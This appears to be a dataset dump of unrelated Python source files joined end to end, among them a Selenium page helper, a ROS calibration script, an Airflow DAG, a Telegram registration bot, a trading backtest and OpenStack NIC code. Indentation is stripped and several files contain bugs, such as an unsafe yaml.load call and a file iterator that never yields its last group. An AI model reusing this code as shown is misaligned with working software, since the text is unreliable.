if self._url_matcher is not None and re.fullmatch(self._url_matcher, self.current_url):
return True
else:
return False
@logged
def assert_loaded(self):
if self.is_loaded():
return True
else:
raise Exception(f"Page {self.__class__} is not loaded.")
@logged
def wait_until_page_loaded(self, timeout=10):
for i in range(1, timeout+1):
logger.debug(f"checking page is loaded {i}/{timeout}")
if self.is_loaded():
logger.debug(f"page is loaded!")
break
time.sleep(1)
else:
raise Exception(f"Timeout loading Page {self.__class__}")
@logged
def wait_until_page_readystate_is_complete(self, timeout=10):
for i in range(1, timeout+1):
logger.debug(f"checking document.readyState {i}/{timeout}")
if self.driver.execute_script("return document.readyState") == "complete":
logger.debug(f"document.readyState is complete!")
break
time.sleep(1)
else:
raise Exception(f"Timeout loading Page {self.__class__}")
@property
def current_url(self):
return self.driver.current_url
class PageSection(object, metaclass=PageMetaclass):
def __init__(self, driver, base_element):
self.driver = driver
self.base_element = base_element
def __enter__(self):
return self
def __exit__(self, *args):
pass
class PageIframe(object, metaclass=PageMetaclass):
def __init__(self, driver, iframe_element):
self.driver = driver
self.iframe_element = iframe_element
def __enter__(self):
self.driver.switch_to_frame(self.iframe_element)
return self
def __exit__(self, *args):
self.driver.switch_to.default_content()
| 8,575 | 2,852 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Author : Heethesh Vhavle
Email : heethesh@cmu.edu
Version : 1.0.1
Date : Jan 18, 2019
Description:
Script to update the camera calibration data into the ROSBAG file
Ensure that this file has executable permissions
Example Usage:
$ rosrun lidar_camera_calibration update_camera_info.py rosbag.bag calibration.yaml
Notes:
Make sure this file has executable permissions:
$ chmod +x update_camera_info.py
'''
# Python 2/3 compatibility
from __future__ import print_function
# Built-in modules
import os
import sys
import yaml
# ROS modules
PKG = 'lidar_camera_calibration'
import roslib; roslib.load_manifest(PKG)
import rosbag
import rospy
def load_calibration_data(filename):
# Open calibration file
with open(filename, 'r') as stream:
try:
calibration = yaml.load(stream)
except yaml.YAMLError as exc:
rospy.logerr(exc)
sys.exit(1)
return calibration
if __name__ == '__main__':
# Get parameters when starting node from a launch file.
if len(sys.argv) < 1:
BAG_FILE = rospy.get_param('filename')
CALIB_FILE = rospy.get_param('calib_data')
CAMERA_INFO = rospy.get_param('camera_info')
# Get parameters as arguments
else:
BAG_FILE = sys.argv[1]
CALIB_FILE = sys.argv[2]
CAMERA_INFO = '/sensors/camera/camera_info'
# Load ROSBAG file
rospy.loginfo('Bag Filename: %s', BAG_FILE)
bag = rosbag.Bag(BAG_FILE, 'r')
# Output file
folder = os.path.dirname(BAG_FILE)
output_name = os.path.splitext(os.path.basename(BAG_FILE))[0] + '_updated.bag'
OUTPUT_FILE = os.path.join(folder, output_name)
os.mknod(OUTPUT_FILE)
output = rosbag.Bag(OUTPUT_FILE, 'w')
# Load calibration data
calibration = load_calibration_data(CALIB_FILE)
# Update calibration data
rospy.loginfo('Updating %s data...' % CAMERA_INFO)
for topic, msg, t in bag.read_messages():
if topic == CAMERA_INFO:
msg.D = calibration['distortion_coefficients']['data']
msg.K = calibration['camera_matrix']['data']
msg.R = calibration['rectification_matrix']['data']
msg.P = calibration['projection_matrix']['data']
output.write(topic, msg, msg.header.stamp if msg._has_header else t)
rospy.loginfo('Done')
# Close bag file
bag.close()
output.close()
| 2,432 | 845 |
from __future__ import division
from numpy.random import RandomState
from numpy_sugar.linalg import sum2diag
from numpy_sugar import epsilon
from numpy_sugar.random import multivariate_normal
class GLMMSampler(object):
def __init__(self, lik, mean, cov):
self._lik = lik
self._mean = mean
self._cov = cov
def sample(self, random_state=None):
if random_state is None:
random_state = RandomState()
m = self._mean.feed('sample').value()
K = self._cov.feed('sample').value()
sum2diag(K, +epsilon.small, out=K)
u = multivariate_normal(m, K, random_state)
sum2diag(K, -epsilon.small, out=K)
return self._lik.sample(u, random_state)
| 733 | 238 |
import datetime as dt
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
"""
if catchup=False, then it will not run for past dates that didn't got executed
"""
default_args = {
'owner': 'airflow',
'start_date': dt.datetime(2020, 7, 1),
'concurrency': 1,
'retries': 0
}
with DAG('simple_dag_backfill',
default_args=default_args,
schedule_interval='@daily') as dag:
task_hello = BashOperator(task_id='hello', bash_command='echo "hello!"')
task_bye = BashOperator(task_id='bye', bash_command='echo "bye!"')
task_hello >> task_bye
| 607 | 206 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .device import (
AgentOtherDeviceId,
Device,
DeviceInfo,
DeviceNames,
)
from .homegraph import (
AgentDeviceId,
DeleteAgentUserRequest,
QueryRequest,
QueryRequestInput,
QueryRequestPayload,
QueryResponse,
QueryResponsePayload,
ReportStateAndNotificationDevice,
ReportStateAndNotificationRequest,
ReportStateAndNotificationResponse,
RequestSyncDevicesRequest,
RequestSyncDevicesResponse,
StateAndNotificationPayload,
SyncRequest,
SyncResponse,
SyncResponsePayload,
)
__all__ = (
'AgentOtherDeviceId',
'Device',
'DeviceInfo',
'DeviceNames',
'AgentDeviceId',
'DeleteAgentUserRequest',
'QueryRequest',
'QueryRequestInput',
'QueryRequestPayload',
'QueryResponse',
'QueryResponsePayload',
'ReportStateAndNotificationDevice',
'ReportStateAndNotificationRequest',
'ReportStateAndNotificationResponse',
'RequestSyncDevicesRequest',
'RequestSyncDevicesResponse',
'StateAndNotificationPayload',
'SyncRequest',
'SyncResponse',
'SyncResponsePayload',
)
| 1,706 | 491 |
import sys
import time
import RPi.GPIO as GPIO
from application import Application, COMMAND_LINE_PARAM_PROFILE_ID
from profiles import profile_by_id, profile_by_jumper
from . import State
from hardware import PINS_PROFILES
class SensingProfileState(State):
def __load_profile__(self, profile_id, first=True):
p = profile_by_id(profile_id)
if first:
self.app.profiles = []
self.app.profile_name = profile_id
self.app.profile_info = p
self.app.detail('Loading "{}"'.format(profile_id))
if "plugins" in p:
for pl in self.app.plugins:
pl.load_conf(p["plugins"][0]["conf"])
if p["type"] == "bin":
self.app.profiles.append(p)
return True
if p["type"] == "composite":
for p0 in p["profiles"]:
self.__load_profile__(p0, False)
return True
raise ValueError("Unknown profile type {}".format(p["type"]))
def __init__(self, app):
super().__init__(app)
for p in PINS_PROFILES:
GPIO.setup(p, GPIO.IN, pull_up_down=GPIO.PUD_UP)
self.app.skip_detect = False
if len(sys.argv) >= COMMAND_LINE_PARAM_PROFILE_ID + 1:
profile_id = sys.argv[COMMAND_LINE_PARAM_PROFILE_ID]
if not profile_id == "_":
self.app.detail("Using profile from args: {}".format(profile_id))
self.__load_profile__(sys.argv[1])
self.app.skip_detect = True
return
self.app.detail("Detecting profile by jumper")
self.message_shown = False
def do_step(self):
if self.app.skip_detect:
return True
for j in range(4):
p = PINS_PROFILES[j]
if not GPIO.input(p):
self.app.detail("Detected jumper {}".format(j + 1))
temp = profile_by_jumper(j + 1)
profile_id = temp["id"]
self.__load_profile__(profile_id)
return True
time.sleep(0.1)
if not self.message_shown:
self.app.print("Connect jumper")
self.message_shown = True
return False
def on_event(self, event):
if event:
return Application.APP_STATE_FIRMWARE_DOWNLOAD
return self
| 2,348 | 724 |
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from FSM.Registation_states import Registration_form
from constants.text_messages import RULES, START_INFO
from keyboards.inline_kb import bicycle_type, gender, apply_registration, check_reg_answer
from utils.loader import dp, db
# нажатие кнопки правила
@dp.callback_query_handler(text='rules')
async def rules(call: CallbackQuery):
await call.answer(cache_time=55)
await call.message.edit_text(f'{RULES}', reply_markup=apply_registration)
# нажатие кнопки "Регистрация"
@dp.callback_query_handler(text='start_reg')
async def reg(call: CallbackQuery):
await call.message.edit_text(f'Привет {call.from_user.full_name}, укажи свой пол:',
reply_markup=gender)
await Registration_form.Sex.set()
# выбор пола и кнопка выбора велосипеда
@dp.callback_query_handler(state=Registration_form.Sex)
async def choose_sex(call: CallbackQuery, state: FSMContext):
await call.answer(cache_time=1)
answer = call.data
await state.update_data(sex=answer)
await db.update_racer_gender(gender=answer, id=call.from_user.id)
await call.message.edit_text(f'В какой категории участвуешь?', reply_markup=bicycle_type)
await Registration_form.next()
# выбор категории велосипеда кнопки выбора проверки ответов
@dp.callback_query_handler(state=Registration_form.Bicycle_type)
async def choose_bicycle_type(call: CallbackQuery, state: FSMContext):
await call.answer(cache_time=1)
answer = call.data
await db.update_racer_bicycle(bicycle=answer, id=call.from_user.id) # добавление в бд
await state.update_data(bicycle_type=answer)
data = await state.get_data()
if data.get('sex') == 'male':
sex = 'Ты выбрал'
elif data.get('sex') == 'female':
sex = 'Ты выбрала'
else:
sex = 'Ты еще не определился с полом (участвуешь вне зачета) и выбрал'
if call.data == 'fixie':
bicycle = 'фиксы 🚲'
else:
bicycle = 'мульти/синглспид 🚴'
await call.message.edit_text(f'{sex} категорию: {bicycle}', reply_markup=check_reg_answer)
await state.reset_state(with_data=False)
# исправление ошибок при регистрации
@dp.callback_query_handler(text='data_not_ok')
async def correcting(call: CallbackQuery, state: FSMContext):
await call.answer(cache_time=1)
await state.reset_data()
await state.reset_state()
await call.message.edit_text('Укажи еще раз свой пол:', reply_markup=gender)
await Registration_form.Sex.set()
# информация о месте старта.
@dp.callback_query_handler(text='data_ok')
async def waiting_start(call: CallbackQuery):
await call.answer(cache_time=1)
await call.message.edit_text(START_INFO)
| 2,741 | 983 |
import json
class JSONUtil:
@staticmethod
def multipart_payload(payload):
return None, json.dumps(payload), 'application/json'
| 145 | 43 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Iterate through a pre-sorted text file and return lines as a group.
============================================================================
AUTHOR: Michael D Dacre, mike.dacre@gmail.com
ORGANIZATION: Stanford University
LICENSE: MIT License, property of Stanford, use as you wish
VERSION: 0.1
CREATED: 2016-29-27 16:09
Last modified: 2016-09-27 17:16
============================================================================
"""
import gzip
import bz2
def giterate(infile, groupby, columns=None, sep='\t', header=False,
pandas=False):
"""Iterate through a text file and yield lines in groups.
:infile: The path to a plain text, gzipped, or bzipped text file or a file
handle.
:groupby: An integer reference to the column you wish to group on or a
column name if either header or column names provided.
:columns: Either None, or an integer count of columns, or a list of column
names you would like to use to access your data. If integer is
provided then column count is confirmed.
:header: If true, first line is used as column names if none provided or
skipped.
:pandas: Yield a pandas dataframe for every group instead of a list of
lists or Line objects.
:yields: Default is a list of lists for each group. If pandas is True,
then yields a dataframe for every group.
"""
if pandas:
import pandas as pd
if isinstance(columns, list):
collen = len(columns)
else:
collen = columns if isinstance(columns, int) else None
columns = None
with open_zipped(infile) as fin:
grp = []
nxt = ''
if header:
head = fin.readline()
if not columns:
columns = head.rstrip().split(sep)
if isinstance(groupby, str):
if isinstance(columns, list):
groupby = columns.index(groupby)
else:
raise ValueError("groupby cannot be a string if neither " +
"header nor column names specified")
for line in fin:
fields = line.rstrip().split(sep)
if collen:
assert collen == fields
if not nxt:
nxt = fields[groupby]
grp.append(fields)
continue
if fields[groupby] == nxt:
grp.append(fields)
continue
else:
if pandas:
out = pd.DataFrame(grp)
if columns:
out.columns = columns
else:
out = grp
grp = [fields]
yield out
def open_zipped(infile, mode='r'):
""" Return file handle of file regardless of zipped or not
Text mode enforced for compatibility with python2 """
mode = mode[0] + 't'
p2mode = mode
if hasattr(infile, 'write'):
return infile
if isinstance(infile, str):
if infile.endswith('.gz'):
return gzip.open(infile, mode)
if infile.endswith('.bz2'):
if hasattr(bz2, 'open'):
return bz2.open(infile, mode)
else:
return bz2.BZ2File(infile, p2mode)
return open(infile, p2mode)
| 3,446 | 927 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2009, Robert Corsaro
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
from trac.core import *
from trac.config import Option
from trac.util.text import to_unicode
from genshi.template import NewTextTemplate
from announcer.distributors.mail import IAnnouncementEmailDecorator
from announcer.util.mail import next_decorator, set_header
class TicketSubjectEmailDecorator(Component):
implements(IAnnouncementEmailDecorator)
ticket_email_subject = Option('announcer', 'ticket_email_subject',
"Ticket #${ticket.id}: ${ticket['summary']} " \
"{% if action %}[${action}]{% end %}",
"""Format string for ticket email subject. This is
a mini genshi template that is passed the ticket
event and action objects.""")
def decorate_message(self, event, message, decorates=None):
if event.realm == 'ticket':
if event.changes:
if 'status' in event.changes:
action = 'Status -> %s' % (event.target['status'])
template = NewTextTemplate(self.ticket_email_subject)
subject = to_unicode(template.generate(
ticket=event.target,
event=event,
action=event.category
).render())
prefix = self.config.get('announcer', 'email_subject_prefix')
if prefix == '__default__':
prefix = '[%s] ' % self.env.project_name
if prefix:
subject = "%s%s"%(prefix, subject)
if event.category != 'created':
subject = 'Re: %s'%subject
set_header(message, 'Subject', subject)
return next_decorator(event, message, decorates)
class TicketAddlHeaderEmailDecorator(Component):
implements(IAnnouncementEmailDecorator)
def decorate_message(self, event, message, decorates=None):
if event.realm == 'ticket':
for k in ('id', 'priority', 'severity'):
name = 'X-Announcement-%s'%k.capitalize()
set_header(message, name, event.target[k])
return next_decorator(event, message, decorates)
| 3,772 | 1,151 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyalgotrade import strategy
from pyalgotrade import plotter
from pyalgotrade.broker.backtesting import Broker
from pyalgotrade.broker.backtesting import TradePercentage
from pyalgotrade.broker.slippage import VolumeShareSlippage
from pyalgotrade.bar import Frequency
from pyalgotrade.technical import ma
from pyalgotrade.stratanalyzer import sharpe
from pyalgotrade.stratanalyzer import returns
from ccwt_client.ccwt_feed import Feed
class MultiSymbols(strategy.BacktestingStrategy):
def __init__(self, feed, instruments, broker):
strategy.BacktestingStrategy.__init__(self, feed, broker)
self.__instruments = instruments
self.__sharesToBuy = {}
# Initialize indicators for each instrument.
''' 技术指标
SMA、EMA、WMA、VMAP、MACD、RSI、StochasticOscillator、BollingerBands、ATR、HurstExponent
CumulativeReturn、LeastSquaresRegression、Slope、StdDev、ZScore
'''
self.__sma = {}
for instrument in instruments:
priceDS = feed[instrument].getPriceDataSeries()
self.__sma[instrument] = ma.SMA(priceDS, 15)
def getSMA(self, instrument):
return self.__sma[instrument]
def onBars(self, bars):
#获取多标的的bar
#for instrument in bars.getInstruments():
# self.info('%s price: %.6f' % (instrument, bars.getBar(instrument).getClose()))
orders = self.getBroker().getActiveOrders('okex_BTCUSDT')
if orders:
self.info(str(orders))
bitmex = bars.getBar('bitmex_XBTUSD')
okex = bars.getBar('okex_BTCUSDT')
bitmexSMA = self.getSMA('bitmex_XBTUSD')
if bitmex is None:
return None
if okex is None:
return None
if bitmexSMA[-1] is None:
return None
if bitmex is not None and okex is not None:
if bitmex.getClose() - okex.getClose() > 3 and bitmex.getClose() > bitmexSMA[-1]:
cash = self.getBroker().getCash()
size = cash * 0.1 / okex.getClose()
'''
size > 0 buy ; size < 0 sell;
marketOrder:以市场价成交 onClose : True,用下一个bar的收盘价; False: 用下一个bar的开盘价,目前onClose True不支持一天内的bar
limitOrder:限价成交
buy:如果下一个bar低于limitPrice,成交价=开盘价;如果下一个bar包含limitPrice,成交价=min(open,limitPrice)
sell:如果下一个bar高于limitPrice,成交价=开盘价;如果下一个bar包含limitPrice,成交价=max(open,limitPrice)
stopOrder:止损单
buy:如果下一个bar高于stopPrice,成交价=开盘价;如果包含stopPrice,成交价=max(open,stopPrice)
sell:如果下一个bar低于stopPrice,成交价=开盘价;如果包含stopPrice,成交价=min(open,stopPrice)
stopLimitOrder:限价止损单
先判断是否到达止损价,然后再判断是否到了限定价格
'''
self.marketOrder('okex_BTCUSDT', size)
self.info('cash %.2f ; size %.2f' % (cash, size))
self.info('bitmex price %.6f ; okex price %.6f ; bitmexSMA %.6f' % (bitmex.getClose(), okex.getClose(), bitmexSMA[-1]))
if bitmex.getClose() - okex.getClose() < 4 and bitmex.getClose() < bitmexSMA[-1]:
okexShares = self.getBroker().getShares('okex_BTCUSDT')
size = okexShares * -0.5
self.marketOrder('okex_BTCUSDT', size)
self.info('okexShares %.2f ; size %.2f' % (okexShares, size))
self.info('bitmex price %.6f ; okex price %.6f ; bitmexSMA %.6f' % (bitmex.getClose(), okex.getClose(), bitmexSMA[-1]))
def main(plot):
instruments = ['bitmex_XBTUSD','okex_BTCUSDT']
feed = Feed(Frequency.SECOND)
feed.loadBars("bitmex_XBTUSD", test_back=True)
feed.loadBars("okex_BTCUSDT", test_back=True)
'''初始保证金'''
initCash = 1000000
'''手续费设置
目前不支持多标的设置不同的手续费类型
3种手续费类型:
NoCommission:None 默认
FixedPerTrade:固定金额
TradePercentage:按比例收费
'''
commission = TradePercentage(0.0003)
broker = Broker(initCash,feed,commission)
#设置为滑点模型,默认为 NoSlippage
#broker.getFillStrategy().setSlippageModel(VolumeShareSlippage)
#设置交易量限制
#每一个bar中的 volume * limit
#broker.getFillStrategy().setVolumeLimit(0.1)
strat = MultiSymbols(feed, instruments, broker)
sharpeRatioAnalyzer = sharpe.SharpeRatio()
strat.attachAnalyzer(sharpeRatioAnalyzer)
returnsAnalyzer = returns.Returns()
strat.attachAnalyzer(returnsAnalyzer)
if plot:
plt = plotter.StrategyPlotter(strat, False, False, True)
plt.getOrCreateSubplot("cash").addCallback("Cash", lambda x: strat.getBroker().getCash())
# Plot strategy vs. SPY cumulative returns.
# plt.getOrCreateSubplot("returns").addDataSeries("SPY", cumret.CumulativeReturn(feed["SPY"].getPriceDataSeries()))
plt.getOrCreateSubplot("returns").addDataSeries("Strategy", returnsAnalyzer.getCumulativeReturns())
strat.run()
print("Sharpe ratio: %.2f" % sharpeRatioAnalyzer.getSharpeRatio(0.05))
print("Returns: %.2f %%" % (returnsAnalyzer.getCumulativeReturns()[-1] * 100))
if plot:
plt.plot()
if __name__ == "__main__":
main(True) | 5,155 | 2,004 |
class Message:
def __init__(self, subject, value, options=None):
self.subject = subject
self.value = value
self.options = options | 158 | 42 |
from django.http import HttpResponse
from django_weasyprint.utils import django_url_fetcher
from weasyprint import HTML
def html_to_pdf_response(html_string, pdf_filename):
pdf_file = HTML(
string=html_string,
url_fetcher=django_url_fetcher,
base_url='file://abobrinha').write_pdf()
response = HttpResponse(pdf_file, content_type='application/pdf')
response['Content-Disposition'] = f'filename="{pdf_filename}"'
return response
| 470 | 141 |
# allows import of package from parent directory
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import numpy as np
import matplotlib.pyplot as plt
from cary_reader import CaryData
data = CaryData.from_csv('test_data/berio_matrix_300_450.csv')
# converts the data to a pandas dataframe, with the excitation wavelengths as
# columns and the emission wavelengths as rows (index)
df = data.get_ex_em_matrix()
X, Y = np.meshgrid(df.index, df.columns)
Z = df.values.transpose()
levels = np.linspace(0, 150, 50) # creates 20 contours between 0 and 150 intensity
plt.contourf(X, Y, Z, levels, cmap=plt.cm.jet)
plt.colorbar()
plt.xlabel('Emission (nm)')
plt.ylabel('Excitation (nm)') | 738 | 283 |
"""Random number generators for random augmentation parametrization"""
from typing import Optional, Tuple
import numpy as np
import scipy.stats
class RandomSampler:
"""Samples random variables from a ``scipy.stats`` distribution."""
def __init__(
self,
rv: scipy.stats.rv_continuous,
shape: Tuple[int, ...] = (),
bounds: Optional[Tuple[float, float]] = None,
):
self.rv = rv
self.shape = shape
self.bounds = bounds
def __call__(self, shape=None):
shape = self.shape if shape is None else shape
rand = self.rv.rvs(size=shape)
if self.bounds is not None:
lo, hi = self.bounds
rand = np.clip(rand, lo, hi)
return rand
class Normal(RandomSampler):
"""Normal distribution sampler."""
def __init__(
self,
mean: float = 0,
sigma: float = 1,
shape: Tuple[int, ...] = (),
bounds: Optional[Tuple[float, float]] = None,
):
rv = scipy.stats.norm(loc=mean, scale=sigma)
super().__init__(rv=rv, shape=shape, bounds=bounds)
class HalfNormal(RandomSampler):
"""Half-normal distribution sampler.
See https://en.wikipedia.org/wiki/Half-normal_distribution.
Note that all sampled values are positive, regardless of the parameters."""
def __init__(
self,
sigma: float = 1,
shape: Tuple[int, ...] = (),
bounds: Optional[Tuple[float, float]] = None,
):
rv = scipy.stats.halfnorm(loc=0, scale=sigma)
super().__init__(rv=rv, shape=shape, bounds=bounds)
class RandInt(RandomSampler):
"""Discrete uniform distribution sampler
Outputs random integers in a defined range ``(low, high)`` with equal
probability.
By default (``low=0, high=2``), it generates binary values (0 or 1)."""
def __init__(
self,
low: int = 0,
high: int = 2,
shape: Tuple[int, ...] = (),
):
rv = scipy.stats.randint(low=low, high=high)
super().__init__(rv=rv, shape=shape, bounds=None)
| 2,149 | 651 |
import torch as th
import numpy as np
'''
prediction:
gradient computation:
loss computation:
parameter updates:
'''
'''All Manual with numpy'''
# f = w*x
# f = 2.x
X = np.array([1,2,3,4],dtype=np.float32)
Y = np.array([2,4,6,8],dtype=np.float32)
w = 0.0
def forward(x):
return w*x
def loss(y,yp):
return np.mean((y-yp)**2)
def gradient(x,y,yp):
#MSE = 1/N*(wx-y)**2
#dJ/dw = 1/N*2x*(w*x - y)
return np.dot(2*x, yp-y).mean()
print(f'prediction before training f(5)= {forward(5):.3f}')
# training
lr = 0.01
n_iters = 100
for epoch in range(n_iters):
# prediction
y_pred = forward(X)
# loss
l = loss(Y,y_pred)
#gradient
dw = gradient(X,Y,y_pred)
# Update weights
w-=lr*dw
if epoch%10==0:
print(f'epoch {epoch+1}: w: {w:.8f}, loss = {l:.8f}')
print(f'Prediction after training: f(5) = {forward(5):.3f}')
| 879 | 411 |
from astropy.modeling.models import custom_model
@custom_model
def quadratic_limb_darkening(mu, a_ld=0., b_ld=0.):
""" Define quadratic limb darkening model with two params. """
return 1. - a_ld * (1. - mu) - b_ld * (1. - mu)**2
@custom_model
def nonlinear_limb_darkening(mu, c0=0., c1=0., c2=0., c3=0.):
""" Define non-linear limb darkening model with four params. """
return (1. - (c0 * (1. - mu**0.5) + c1 * (1. - mu)
+ c2 * (1. - mu**1.5) + c3 * (1. - mu**2)))
| 497 | 206 |
import socket
# 1. create socket
# 2. bind
# 3. listen
# 4. accept
# 5. recv
# 6. send
# 7. close -> 3
# 运行这个程序后, 浏览器打开 localhost:2000 就能访问了
# 一般浏览器默认2个连接GET / HTTP/1.1 和 GET /favicon.ico HTTP/1.1
s = socket.socket()
host = ''
port = 2000
s.bind((host, port))
while True:
s.listen(5)
print('before accept')
# 当有客户端过来连接的时候, s.accept 函数就会返回 2 个值
# 分别是 连接 和 客户端 ip 地址
connection, address = s.accept()
print('after accept')
buf = b''
while True:
cache = connection.recv(1024)
buf += cache
if len(cache) < 1024:
break
request = buf.decode('utf-8')
print('客户端ip and request: {}\n{}'.format(address, request))
response = b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>Hello, world</h1>'
connection.sendall(response)
connection.close()
| 831 | 399 |
# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import logging
from openstack import exceptions as sdk_exc
from metalsmith import _utils
from metalsmith import exceptions
LOG = logging.getLogger(__name__)
class NICs(object):
"""Requested NICs."""
def __init__(self, connection, node, nics, hostname=None):
if nics is None:
nics = []
if not isinstance(nics, collections.abc.Sequence):
raise TypeError("NICs must be a list of dicts")
for nic in nics:
if not isinstance(nic, collections.abc.Mapping):
raise TypeError("Each NIC must be a dict got %s" % nic)
self._node = node
self._connection = connection
self._nics = nics
self._validated = None
self._hostname = hostname
self.created_ports = []
self.attached_ports = []
def validate(self):
"""Validate provided NIC records."""
if self._validated is not None:
return
result = []
for nic in self._nics:
if 'port' in nic:
result.append(('port', self._get_port(nic)))
elif 'network' in nic:
result.append(('network', self._get_network(nic)))
elif 'subnet' in nic:
result.append(('subnet', self._get_subnet(nic)))
else:
raise exceptions.InvalidNIC(
'Unknown NIC record type, export "port", "subnet" or '
'"network", got %s' % nic)
self._validated = result
def create_and_attach_ports(self):
"""Attach ports to the node, creating them if requested."""
self.validate()
for nic_type, nic in self._validated:
if nic_type != 'port':
# The 'binding:host_id' must be set to ensure IP allocation
# is not deferred.
# See: https://storyboard.openstack.org/#!/story/2009715
port = self._connection.network.create_port(
binding_host_id=self._node.id, **nic)
self.created_ports.append(port.id)
LOG.info('Created port %(port)s for node %(node)s with '
'%(nic)s', {'port': _utils.log_res(port),
'node': _utils.log_res(self._node),
'nic': nic})
else:
# The 'binding:host_id' must be set to ensure IP allocation
# is not deferred.
# See: https://storyboard.openstack.org/#!/story/2009715
self._connection.network.update_port(
nic, binding_host_id=self._node.id)
port = nic
self._connection.baremetal.attach_vif_to_node(self._node,
port.id)
LOG.info('Attached port %(port)s to node %(node)s',
{'port': _utils.log_res(port),
'node': _utils.log_res(self._node)})
self.attached_ports.append(port.id)
def detach_and_delete_ports(self):
"""Detach attached port and delete previously created ones."""
detach_and_delete_ports(self._connection, self._node,
self.created_ports, self.attached_ports)
def _get_port(self, nic):
"""Validate and get the NIC information for a port.
:param nic: NIC information in the form ``{"port": "<port ident>"}``.
:returns: `Port` object to use.
"""
unexpected = set(nic) - {'port'}
if unexpected:
raise exceptions.InvalidNIC(
'Unexpected fields for a port: %s' % ', '.join(unexpected))
try:
port = self._connection.network.find_port(
nic['port'], ignore_missing=False)
except sdk_exc.SDKException as exc:
raise exceptions.InvalidNIC(
'Cannot find port %(port)s: %(error)s' %
{'port': nic['port'], 'error': exc})
return port
def _get_network(self, nic):
"""Validate and get the NIC information for a network.
:param nic: NIC information in the form ``{"network": "<net ident>"}``
or ``{"network": "<net ident>", "fixed_ip": "<desired IP>"}``.
:returns: keyword arguments to use when creating a port.
"""
unexpected = set(nic) - {'network', 'fixed_ip'}
if unexpected:
raise exceptions.InvalidNIC(
'Unexpected fields for a network: %s' % ', '.join(unexpected))
try:
network = self._connection.network.find_network(
nic['network'], ignore_missing=False)
except sdk_exc.SDKException as exc:
raise exceptions.InvalidNIC(
'Cannot find network %(net)s: %(error)s' %
{'net': nic['network'], 'error': exc})
port_args = {'network_id': network.id}
if nic.get('fixed_ip'):
port_args['fixed_ips'] = [{'ip_address': nic['fixed_ip']}]
if self._hostname:
port_args['name'] = '%s-%s' % (self._hostname, network.name)
return port_args
def _get_subnet(self, nic):
"""Validate and get the NIC information for a subnet.
:param nic: NIC information in the form ``{"subnet": "<id or name>"}``.
:returns: keyword arguments to use when creating a port.
"""
unexpected = set(nic) - {'subnet'}
if unexpected:
raise exceptions.InvalidNIC(
'Unexpected fields for a subnet: %s' % ', '.join(unexpected))
try:
subnet = self._connection.network.find_subnet(
nic['subnet'], ignore_missing=False)
except sdk_exc.SDKException as exc:
raise exceptions.InvalidNIC(
'Cannot find subnet %(sub)s: %(error)s' %
{'sub': nic['subnet'], 'error': exc})
try:
network = self._connection.network.get_network(subnet.network_id)
except sdk_exc.SDKException as exc:
raise exceptions.InvalidNIC(
'Cannot find network %(net)s for subnet %(sub)s: %(error)s' %
{'net': subnet.network_id, 'sub': nic['subnet'], 'error': exc})
port_args = {'network_id': network.id,
'fixed_ips': [{'subnet_id': subnet.id}]}
if self._hostname:
port_args['name'] = '%s-%s' % (self._hostname, network.name)
return port_args
def detach_and_delete_ports(connection, node, created_ports, attached_ports):
"""Detach attached port and delete previously created ones.
:param connection: `openstacksdk.Connection` instance.
:param node: `Node` object to detach ports from.
:param created_ports: List of IDs of previously created ports.
:param attached_ports: List of IDs of previously attached_ports.
"""
for port_id in set(attached_ports + created_ports):
LOG.debug('Detaching port %(port)s from node %(node)s',
{'port': port_id, 'node': _utils.log_res(node)})
try:
connection.baremetal.detach_vif_from_node(node, port_id)
except Exception as exc:
LOG.debug('Failed to remove VIF %(vif)s from node %(node)s, '
'assuming already removed: %(exc)s',
{'vif': port_id, 'node': _utils.log_res(node),
'exc': exc})
for port_id in created_ports:
LOG.debug('Deleting port %s', port_id)
